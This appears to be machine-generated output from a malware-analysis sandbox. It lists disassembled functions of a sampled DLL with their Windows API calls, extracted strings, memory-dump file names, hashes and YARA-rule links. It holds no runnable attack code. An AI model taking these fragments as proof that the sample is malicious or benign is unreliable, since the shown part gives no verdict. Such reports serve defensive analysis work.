Function 6EA0FE30, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 263COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA4E328,49283B4B), ref: 6EA0FE8D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6EA0FF10
LoadTypeLib.OLEAUT32(?,00000000), ref: 6EA0FF37
LoadRegTypeLib.OLEAUT32(6EA46478,00000000,00000000,?,00000000), ref: 6EA0FF52
EnterCriticalSection.KERNEL32(6EA4E344), ref: 6EA10115
LeaveCriticalSection.KERNEL32(6EA4E344), ref: 6EA1012B

Strings

K;(Io, xrefs: 6EA0FE47

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID: K;(Io
API String ID: 1976781235-79920696
Opcode ID: 583f4a4257e16a7088f71edb999340ba71c57d20d10d7f03b9154bf3154503f8
Instruction ID: b5f40ca5c80ce952ef7f6761f3d94e02ed37c3b03f2b7622feb4590de5138e30
Opcode Fuzzy Hash: 583f4a4257e16a7088f71edb999340ba71c57d20d10d7f03b9154bf3154503f8
Instruction Fuzzy Hash: 20B16C74905229DFDB10DBA4C988B9AB7F5BF4A304F2580D9E809EB340DB359E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0DCB0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 163libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6EA0DD3D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6EA0DD4F
FindResourceW.KERNEL32(00000000,?,?), ref: 6EA0DD76
LoadResource.KERNEL32(00000000,00000000), ref: 6EA0DD8E

Part of subcall function 6EA0D340: GetLastError.KERNEL32(80070057,8007000E,80004005), ref: 6EA0D340

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6EA0DE7F

Strings

K;(Io, xrefs: 6EA0DCC7

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID: K;(Io
API String ID: 328770362-79920696
Opcode ID: 2b4bdb132d17293d269bfe28728d733a902c1a6e7b86d5b5f85bf0e4bfbe30fd
Instruction ID: 633faa9f127551d0636a7671270cd189e5e82a678b7b8104e0866f421d58fb0d
Opcode Fuzzy Hash: 2b4bdb132d17293d269bfe28728d733a902c1a6e7b86d5b5f85bf0e4bfbe30fd
Instruction Fuzzy Hash: 335105B2A002199FCB21CB94DC40BDEB7B9EF99718F504159F608A7280DB349E85CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17132, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6EA17478,6EA4DBA8,?,00000000,?,6EA1204A,?,?,00000000,?,?,C000008C), ref: 6EA17144
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6EA17478,6EA4DBA8,?,00000000,?,6EA1204A,?,?,00000000), ref: 6EA17159
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,C000008C), ref: 6EA171D5

Strings

AtlThunk_FreeData, xrefs: 6EA171AF
AtlThunk_AllocateData, xrefs: 6EA1716A
atlthunk.dll, xrefs: 6EA17154
AtlThunk_InitData, xrefs: 6EA17181
AtlThunk_DataToCode, xrefs: 6EA17198

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: ba6e977e9ba65b67c11eee23920fba26856045ad73fcd5ce1f8f9a4056bd6849
Instruction ID: 77da06c5a21b94e9279f84ace413e4c99cf9fdd9c740d4ec1e9a8070cfcebe2e
Opcode Fuzzy Hash: ba6e977e9ba65b67c11eee23920fba26856045ad73fcd5ce1f8f9a4056bd6849
Instruction Fuzzy Hash: 14018431408A31AECF02AA90CC15FC53B5A6F13289F545050BC45FE7E5DB669ACACE9D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33837, Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA338A5
_free.LIBCMT ref: 6EA338B1
_free.LIBCMT ref: 6EA339DA
_free.LIBCMT ref: 6EA339E5

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 13fd61fb210f40112095599a2d96401116e295b212783f3abdb898a069955499
Instruction ID: f9723c6af888dac2ba64bbd517f5153cff4cd777f6024bce6d52defa5ef7fbc4
Opcode Fuzzy Hash: 13fd61fb210f40112095599a2d96401116e295b212783f3abdb898a069955499
Instruction Fuzzy Hash: 35611771904715DFD710CFE8C840B9AB7F9EF45310F284969E9A9EB284E7319C84CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2A54F, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28A1F

_free.LIBCMT ref: 6EA2A85C
_free.LIBCMT ref: 6EA2A875
_free.LIBCMT ref: 6EA2A8B5
_free.LIBCMT ref: 6EA2A8BE
_free.LIBCMT ref: 6EA2A8CA

Strings

C, xrefs: 6EA2A6AB
K;(Io, xrefs: 6EA2A55A

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C$K;(Io
API String ID: 3291180501-3058925215
Opcode ID: c26add7eb8fa2c949ab572373d707932ab98548d8013feba868b5216cb098988
Instruction ID: e2321c162638180abe6986cc827dcfb3a53c4122b8949ca73449517f3a0e9de7
Opcode Fuzzy Hash: c26add7eb8fa2c949ab572373d707932ab98548d8013feba868b5216cb098988
Instruction Fuzzy Hash: 9AB15875A0121A9FDB24DF58C994A9DB7B5FF48304F1885EAE819A7350E730AED0CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10A60, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 198threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6EA10B0E

Part of subcall function 6EA123E0: EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12414
Part of subcall function 6EA123E0: GetClassInfoExW.USER32 ref: 6EA12449
Part of subcall function 6EA123E0: GetClassInfoExW.USER32 ref: 6EA1245C
Part of subcall function 6EA123E0: LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12467

Part of subcall function 6EA173A0: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6EA1226B), ref: 6EA173A5
Part of subcall function 6EA173A0: HeapAlloc.KERNEL32(00000000), ref: 6EA173AC

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,6EA38FD0,000000FF), ref: 6EA10B57
GetCurrentThreadId.KERNEL32 ref: 6EA10BFC
EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA10C0A
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA10C23
CreateWindowExW.USER32 ref: 6EA10C59

Strings

K;(Io, xrefs: 6EA10A88

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID: K;(Io
API String ID: 859899439-79920696
Opcode ID: e538de4996480cd9e8527ac29f5ae5dc14b6621176d3f3e9f8763ec40ed9792c
Instruction ID: c31c044b31245f708041cad2372c77850c55a359210d113fe3bd9ab076d2c7ff
Opcode Fuzzy Hash: e538de4996480cd9e8527ac29f5ae5dc14b6621176d3f3e9f8763ec40ed9792c
Instruction Fuzzy Hash: 1D617DB1904619EFDB10CFA8C894BAEBBB5FF49714F148219F815BB340E731A890CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA04690, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA046D9
std::_Lockit::_Lockit.LIBCPMT ref: 6EA046FB
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA0471B
__Getctype.LIBCPMT ref: 6EA047B1
std::_Facet_Register.LIBCPMT ref: 6EA047D0
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA047E8

Strings

K;(Io, xrefs: 6EA046B8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: K;(Io
API String ID: 1102183713-79920696
Opcode ID: 3586b3bef8e6d82e4d1c19e4d4afdb6edee489ac06be206ae92b6d9aaa4faa90
Instruction ID: 31704a8d7a787edb850bbf193b06be1dd7fe97ffadc4fc29ea933840c1717636
Opcode Fuzzy Hash: 3586b3bef8e6d82e4d1c19e4d4afdb6edee489ac06be206ae92b6d9aaa4faa90
Instruction Fuzzy Hash: 0C412070E04604DFDB12DF98D940ADEB7B8FF15718F148169D805AB341EB31AE86CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0D600, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA0D510: GetModuleHandleW.KERNEL32(Advapi32.dll,49283B4B), ref: 6EA0D564

RegCloseKey.ADVAPI32(?,?,?), ref: 6EA0D662
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6EA0D6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6EA0D6E3
RegCloseKey.ADVAPI32(?), ref: 6EA0D6F8
RegCloseKey.ADVAPI32(?), ref: 6EA0D720
RegCloseKey.ADVAPI32(?), ref: 6EA0D748

Strings

K;(Io, xrefs: 6EA0D60C

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID: K;(Io
API String ID: 2852649468-79920696
Opcode ID: 2a71e361683afd09a00498a6321d590d527049b11827402676952528cf90dfa4
Instruction ID: 9cd80e84139b671ac3b59361e95a3e8b187988957d626a37e0d691ba9af61614
Opcode Fuzzy Hash: 2a71e361683afd09a00498a6321d590d527049b11827402676952528cf90dfa4
Instruction Fuzzy Hash: C04171B22083159BD710DF65EC54BABB7E8EF88358F00492EF959D7280DB70D904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA18230, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6EA18267
___except_validate_context_record.LIBVCRUNTIME ref: 6EA1826F
_ValidateLocalCookies.LIBCMT ref: 6EA182F8
__IsNonwritableInCurrentImage.LIBCMT ref: 6EA18323
_ValidateLocalCookies.LIBCMT ref: 6EA18378

Strings

csm, xrefs: 6EA1830D
K;(Io, xrefs: 6EA182E2, 6EA1835F

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: K;(Io$csm
API String ID: 1170836740-2692768455
Opcode ID: 549e46e9b97f79b8165e65ab5ed7d3814539cd5217159c52b7f2e56a8bceaf0a
Instruction ID: 350e4dab8d3d0610163af758e92b979c38bcebc3160bd5219a1e37f33a1379b4
Opcode Fuzzy Hash: 549e46e9b97f79b8165e65ab5ed7d3814539cd5217159c52b7f2e56a8bceaf0a
Instruction Fuzzy Hash: E441E434A08619DFCF00CFA9C890ADEBBB6BF45328F148155E8289F351C7319D85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA122B0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6EA12340
GetWindowLongW.USER32(?,000000FC), ref: 6EA12354
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6EA1236A
GetWindowLongW.USER32(?,000000FC), ref: 6EA12383
SetWindowLongW.USER32(?,000000FC,?), ref: 6EA12392

Strings

$, xrefs: 6EA122F4
K;(Io, xrefs: 6EA122B6

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $$K;(Io
API String ID: 513923721-4165078260
Opcode ID: 0b0da47f5d06c55f476106dc7f81e03b3a4121ef360e5dfcde780fd8437ae6bb
Instruction ID: 986975d1d2e9f4e3fe92d35b4f10311f8282624c40584cdb669f0d40742c9fc8
Opcode Fuzzy Hash: 0b0da47f5d06c55f476106dc7f81e03b3a4121ef360e5dfcde780fd8437ae6bb
Instruction Fuzzy Hash: F1411671904708AFCB20CF99C884A9EBBF5FF49310F108A1DE856A72A0D731E954DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0D510, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,49283B4B), ref: 6EA0D564
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6EA0D57B
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,49283B4B), ref: 6EA0D5B0
RegCloseKey.ADVAPI32(00000000), ref: 6EA0D5C3

Strings

K;(Io, xrefs: 6EA0D524
Advapi32.dll, xrefs: 6EA0D55F
RegOpenKeyTransactedW, xrefs: 6EA0D575

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$K;(Io$RegOpenKeyTransactedW
API String ID: 823179699-3774551617
Opcode ID: 9b77c242050402cf474dc2dcc6adaa0ffc23aa2f82e6ee72f702beca06d43cb9
Instruction ID: 0e5fa170531c805a2471bd9f7a09e2e1d4d8b91de44a257ff38cf01a9131ee87
Opcode Fuzzy Hash: 9b77c242050402cf474dc2dcc6adaa0ffc23aa2f82e6ee72f702beca06d43cb9
Instruction Fuzzy Hash: 79317371A04615EFDF10CF99DC44BABBBB9FB49718F104529F815EB280D734A940CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2CB41, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 6EA2CBAC
api-ms-, xrefs: 6EA2CB98
@Mt, xrefs: 6EA2CB8B

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @Mt$api-ms-$ext-ms-
API String ID: 0-3879450930
Opcode ID: eaf69bdb35fe1b99e337f5583371773dbd9d5c4e77abad4ba2f9b97d86173b8b
Instruction ID: 69f64edb9e25798346a4162b1a9a41f2160d62bbb1a2c124f063d970253cd77f
Opcode Fuzzy Hash: eaf69bdb35fe1b99e337f5583371773dbd9d5c4e77abad4ba2f9b97d86173b8b
Instruction Fuzzy Hash: 0821A872945725AFDB618AA98C84A4A77689F02760F3D4531FC19FF280D632DD81C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19ACC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6EA181BC,6EA14296,6EA14919,?,6EA14B51,?,00000001,?,?,00000001,?,6EA49E00,0000000C,6EA14C4A), ref: 6EA19ADA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA19AE8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EA19B01
SetLastError.KERNEL32(00000000,6EA14B51,?,00000001,?,?,00000001,?,6EA49E00,0000000C,6EA14C4A,?,00000001,?), ref: 6EA19B53

Strings

@Mt, xrefs: 6EA19ADA

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID: @Mt
API String ID: 3852720340-1491384996
Opcode ID: 9574b0d16c3f53c69fe942c22c11ec543d8e780c97689e82066bf00b603b26c1
Instruction ID: d2e60e50d87dadfedbec70362c02ba240a1c908a719dc8409970a7029a347bbc
Opcode Fuzzy Hash: 9574b0d16c3f53c69fe942c22c11ec543d8e780c97689e82066bf00b603b26c1
Instruction Fuzzy Hash: 47014C3222EB119EBB4119F46E84AC62769DF03BBD720823DF5145E0E0EF124C8AD648

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1723E, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6EA173E8,00000000), ref: 6EA17262
HeapAlloc.KERNEL32(00000000), ref: 6EA17269

Part of subcall function 6EA17334: IsProcessorFeaturePresent.KERNEL32(0000000C,6EA17250,00000000,?,6EA173E8,00000000), ref: 6EA17336

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6EA173E8,00000000), ref: 6EA17279
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6EA172A0
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6EA172B4
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6EA172C7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6EA172DA

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 264d9f9e671bbb1afbd3ad702f5cfc07cead00b4d08442c2b64f45e857c602a1
Instruction ID: b1dfbcf85b24af4228deead3e2936272ca60f08cb9cf7fe254629a701b9077ab
Opcode Fuzzy Hash: 264d9f9e671bbb1afbd3ad702f5cfc07cead00b4d08442c2b64f45e857c602a1
Instruction Fuzzy Hash: DF110B75648F21ABDF3116E9CC48FEA322EEB47745F145420FD04FA180CA61CC838AA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0F4C0, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6EA00000,?,00000104), ref: 6EA0F6AC
GetModuleHandleW.KERNEL32(00000000), ref: 6EA0F864

Part of subcall function 6EA07B50: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6EA07B5D

Strings

REGISTRY, xrefs: 6EA0F969
Module, xrefs: 6EA0F911
K;(Io, xrefs: 6EA0F4D7
Module_Raw, xrefs: 6EA0F93C

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$ExceptionFileHandleNameRaise
String ID: K;(Io$Module$Module_Raw$REGISTRY
API String ID: 1728487212-2849904609
Opcode ID: 60abe33ce1c549cb10ef498ad77e66af319e17aa0f8bcf00bd31957de85e78c6
Instruction ID: ca57ed23b07e83de1616bc68ced064a8aa2db5dab387b29d8179ec6df391ddaa
Opcode Fuzzy Hash: 60abe33ce1c549cb10ef498ad77e66af319e17aa0f8bcf00bd31957de85e78c6
Instruction Fuzzy Hash: 5AD18379A002258BDB649BA4ED50BDE7374BF45308F1405ADD80AB7640EB74AEC4CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA105E0, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 276COMMON

Download Yara Rule

APIs

Part of subcall function 6EA0AF10: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,49283B4B,?), ref: 6EA0AD57

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6EA10638
PdhRemoveCounter.PDH(?,?,00000000), ref: 6EA106D3
PdhCloseQuery.PDH(?,?,00000000), ref: 6EA106E8

Strings

0, xrefs: 6EA10796
edit, xrefs: 6EA10631
K;(Io, xrefs: 6EA105E9, 6EA106A9

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$K;(Io$edit
API String ID: 2809573910-85316194
Opcode ID: 9ce524eacb2d38da9ecaa42db8d79ed57e9d32dfe270d9d31d233b296146a7e1
Instruction ID: 3656a9c2eae75e9e2334d6a863338bc1d48d7794a84aa93d74a58b1d09c6d598
Opcode Fuzzy Hash: 9ce524eacb2d38da9ecaa42db8d79ed57e9d32dfe270d9d31d233b296146a7e1
Instruction Fuzzy Hash: 5A91EE716087118BE700CFA8C990B9AB7A5FF85318F104A1CE9949B290E772EDD5CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2DE6C, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6EA2DEF0
__alloca_probe_16.LIBCMT ref: 6EA2DFB6
__freea.LIBCMT ref: 6EA2E022

Part of subcall function 6EA2828C: RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

__freea.LIBCMT ref: 6EA2E02B
__freea.LIBCMT ref: 6EA2E050

Strings

K;(Io, xrefs: 6EA2DE73

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: K;(Io
API String ID: 1423051803-79920696
Opcode ID: 5190a6dab040a8f05ceb93c8b7b531be6a4ba7aa44ad4e4de17def78b04b437f
Instruction ID: 63b124a642523c53dec03ae09e213a42c74caf1d03d9273c1c4ee501f394d387
Opcode Fuzzy Hash: 5190a6dab040a8f05ceb93c8b7b531be6a4ba7aa44ad4e4de17def78b04b437f
Instruction Fuzzy Hash: 5251C072544216AFEB118EE58C40EAB36E9DF85758F2E4539FC14BB140EB31DCD18AAC

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2A0C6, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2828C: RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

_free.LIBCMT ref: 6EA2A1D5
_free.LIBCMT ref: 6EA2A1EC
_free.LIBCMT ref: 6EA2A20B
_free.LIBCMT ref: 6EA2A226
_free.LIBCMT ref: 6EA2A23D

Strings

K;(Io, xrefs: 6EA2A26E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
